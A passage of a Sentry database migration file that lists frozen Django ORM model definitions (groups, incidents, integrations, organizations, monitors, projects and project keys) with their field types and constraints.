'uuid': ('django.db.models.fields.CharField', [], {'default': "'993f599bf9114fe1b88e46386a3514da'", 'unique': 'True', 'max_length': '32'})
},
'sentry.groupsnooze': {
'Meta': {'unique_together': '()', 'object_name': 'GroupSnooze', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'unique': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'state': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'until': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'user_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'user_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'})
},
'sentry.groupsubscription': {
'Meta': {'unique_together': "(('group', 'user'),)", 'object_name': 'GroupSubscription', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'subscription_set'", 'to': "orm['sentry.Project']"}),
'reason': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.grouptagkey': {
'Meta': {'unique_together': "(('project_id', 'group_id', 'key'),)", 'object_name': 'GroupTagKey', 'index_together': '()'},
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'values_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.grouptagvalue': {
'Meta': {'unique_together': "(('group_id', 'key', 'value'),)", 'object_name': 'GroupTagValue', 'db_table': "'sentry_messagefiltervalue'", 'index_together': "(('project_id', 'key', 'value', 'last_seen'),)"},
'first_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True', 'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'times_seen': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'sentry.grouptombstone': {
'Meta': {'unique_together': '()', 'object_name': 'GroupTombstone', 'index_together': '()'},
'actor_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'culprit': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'level': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '40', 'blank': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'previous_group_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'unique': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.identity': {
'Meta': {'unique_together': "(('idp', 'external_id'), ('idp', 'user'))", 'object_name': 'Identity', 'index_together': '()'},
'data': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_verified': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'idp': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.IdentityProvider']"}),
'scopes': ('sentry.db.models.fields.array.ArrayField', [], {'of': (u'django.db.models.fields.TextField', [], {})}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.identityprovider': {
'Meta': {'unique_together': "(('type', 'external_id'),)", 'object_name': 'IdentityProvider', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.incident': {
'Meta': {'unique_together': "(('organization', 'identifier'),)", 'object_name': 'Incident', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_closed': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'date_detected': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_started': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'detection_uuid': ('sentry.db.models.fields.uuid.UUIDField', [], {'max_length': '32', 'null': 'True', 'db_index': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentGroup']", 'to': "orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.IntegerField', [], {}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'incidents'", 'symmetrical': 'False', 'through': "orm['sentry.IncidentProject']", 'to': "orm['sentry.Project']"}),
'query': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.PositiveSmallIntegerField', [], {}),
'title': ('django.db.models.fields.TextField', [], {})
},
'sentry.incidentactivity': {
'Meta': {'unique_together': '()', 'object_name': 'IncidentActivity', 'index_together': '()'},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event_stats_snapshot': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.TimeSeriesSnapshot']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'previous_value': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'type': ('django.db.models.fields.IntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'sentry.incidentgroup': {
'Meta': {'unique_together': "(('group', 'incident'),)", 'object_name': 'IncidentGroup', 'index_together': '()'},
'group': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Group']", 'db_index': 'False'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"})
},
'sentry.incidentproject': {
'Meta': {'unique_together': "(('project', 'incident'),)", 'object_name': 'IncidentProject', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'db_index': 'False'})
},
'sentry.incidentseen': {
'Meta': {'unique_together': "(('user', 'incident'),)", 'object_name': 'IncidentSeen', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'incident': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Incident']"}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'db_index': 'False'})
},
'sentry.integration': {
'Meta': {'unique_together': "(('provider', 'external_id'),)", 'object_name': 'Integration', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'metadata': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organizations': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationIntegration']", 'to': "orm['sentry.Organization']"}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'integrations'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectIntegration']", 'to': "orm['sentry.Project']"}),
'provider': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'null': 'True'})
},
'sentry.integrationexternalproject': {
'Meta': {'unique_together': "(('organization_integration_id', 'external_id'),)", 'object_name': 'IntegrationExternalProject', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'organization_integration_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'resolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'unresolved_status': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'sentry.latestrelease': {
'Meta': {'unique_together': "(('repository_id', 'environment_id'),)", 'object_name': 'LatestRelease', 'index_together': '()'},
'commit_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'deploy_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True'}),
'environment_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'release_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'repository_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.lostpasswordhash': {
'Meta': {'unique_together': '()', 'object_name': 'LostPasswordHash', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'hash': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'unique': 'True'})
},
'sentry.monitor': {
'Meta': {'unique_together': '()', 'object_name': 'Monitor', 'index_together': "(('type', 'next_checkin'),)"},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'last_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'next_checkin': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'organization_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorcheckin': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorCheckIn', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'duration': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'location': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.MonitorLocation']", 'null': 'True'}),
'monitor': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Monitor']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'db_index': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.monitorlocation': {
'Meta': {'unique_together': '()', 'object_name': 'MonitorLocation', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'guid': ('sentry.db.models.fields.uuid.UUIDField', [], {'auto_add': "'uuid:uuid4'", 'unique': 'True', 'max_length': '32'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
'sentry.option': {
'Meta': {'unique_together': '()', 'object_name': 'Option', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '64'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.organization': {
'Meta': {'unique_together': '()', 'object_name': 'Organization', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'default_role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'org_memberships'", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMember']", 'to': "orm['sentry.User']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationaccessrequest': {
'Meta': {'unique_together': "(('team', 'member'),)", 'object_name': 'OrganizationAccessRequest', 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'member': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationavatar': {
'Meta': {'unique_together': '()', 'object_name': 'OrganizationAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Organization']"})
},
'sentry.organizationintegration': {
'Meta': {'unique_together': "(('organization', 'integration'),)", 'object_name': 'OrganizationIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'default_auth_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0'})
},
'sentry.organizationmember': {
'Meta': {'unique_together': "(('organization', 'user'), ('organization', 'email'))", 'object_name': 'OrganizationMember', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0'}),
'has_global_access': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'member_set'", 'to': "orm['sentry.Organization']"}),
'role': ('django.db.models.fields.CharField', [], {'default': "'member'", 'max_length': '32'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sentry.Team']", 'symmetrical': 'False', 'through': "orm['sentry.OrganizationMemberTeam']", 'blank': 'True'}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '64', 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'token_expires_at': ('django.db.models.fields.DateTimeField', [], {'default': 'None', 'null': 'True'}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '50', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'blank': 'True', 'related_name': "u'sentry_orgmember_set'", 'null': 'True', 'to': "orm['sentry.User']"})
},
'sentry.organizationmemberteam': {
'Meta': {'unique_together': "(('team', 'organizationmember'),)", 'object_name': 'OrganizationMemberTeam', 'db_table': "'sentry_organizationmember_teams'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'organizationmember': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.OrganizationMember']"}),
'team': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Team']"})
},
'sentry.organizationonboardingtask': {
'Meta': {'unique_together': "(('organization', 'task'),)", 'object_name': 'OrganizationOnboardingTask', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_completed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {'null': 'True', 'blank': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'task': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']", 'null': 'True'})
},
'sentry.organizationoption': {
'Meta': {'unique_together': "(('organization', 'key'),)", 'object_name': 'OrganizationOption', 'db_table': "'sentry_organizationoptions'", 'index_together': '()'},
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'value': ('sentry.db.models.fields.encrypted.EncryptedPickledObjectField', [], {})
},
'sentry.platformexternalissue': {
'Meta': {'unique_together': "(('group_id', 'service_type'),)", 'object_name': 'PlatformExternalIssue', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'display_name': ('django.db.models.fields.TextField', [], {}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'service_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'web_url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'sentry.processingissue': {
'Meta': {'unique_together': "(('project', 'checksum', 'type'),)", 'object_name': 'ProcessingIssue', 'index_together': '()'},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40', 'db_index': 'True'}),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
'sentry.project': {
'Meta': {'unique_together': "(('organization', 'slug'),)", 'object_name': 'Project', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'first_event': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'flags': ('django.db.models.fields.BigIntegerField', [], {'default': '0', 'null': 'True'}),
'forced_color': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'organization': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Organization']"}),
'platform': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'}),
'teams': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "u'teams'", 'symmetrical': 'False', 'through': "orm['sentry.ProjectTeam']", 'to': "orm['sentry.Team']"})
},
'sentry.projectavatar': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectAvatar', 'index_together': '()'},
'avatar_type': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0'}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']", 'unique': 'True', 'null': 'True', 'on_delete': 'models.SET_NULL'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'avatar'", 'unique': 'True', 'to': "orm['sentry.Project']"})
},
'sentry.projectbookmark': {
'Meta': {'unique_together': "(('project', 'user'),)", 'object_name': 'ProjectBookmark', 'index_together': '()'},
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True', 'blank': 'True'}),
'user': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.User']"})
},
'sentry.projectcficachefile': {
'Meta': {'unique_together': "(('project', 'debug_file'),)", 'object_name': 'ProjectCfiCacheFile', 'index_together': '()'},
'cache_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'debug_file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.ProjectDebugFile']", 'on_delete': 'models.DO_NOTHING', 'db_column': "'dsym_file_id'"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'}),
'version': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.projectdebugfile': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectDebugFile', 'db_table': "'sentry_projectdsymfile'", 'index_together': "(('project', 'debug_id'), ('project', 'code_id'))"},
'code_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'cpu_name': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'null': 'True'}),
'debug_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'db_column': "'uuid'"}),
'file': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.File']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'object_name': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']", 'null': 'True'})
},
'sentry.projectintegration': {
'Meta': {'unique_together': "(('project', 'integration'),)", 'object_name': 'ProjectIntegration', 'index_together': '()'},
'config': ('sentry.db.models.fields.encrypted.EncryptedJsonField', [], {'default': '{}'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'integration': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Integration']"}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'to': "orm['sentry.Project']"})
},
'sentry.projectkey': {
'Meta': {'unique_together': '()', 'object_name': 'ProjectKey', 'index_together': '()'},
'data': ('sentry.db.models.fields.jsonfield.JSONField', [], {'default': '{}'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'project': ('sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {'related_name': "u'key_set'", 'to': "orm['sentry.Project']"}),
'public_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'rate_limit_count': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'rate_limit_window': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'null': 'True'}),
'roles': ('django.db.models.fields.BigIntegerField', [], {'default': '1'}),
'secret_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'unique': 'True', 'null': 'True'}),
'status': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
'sentry.projectoption': {
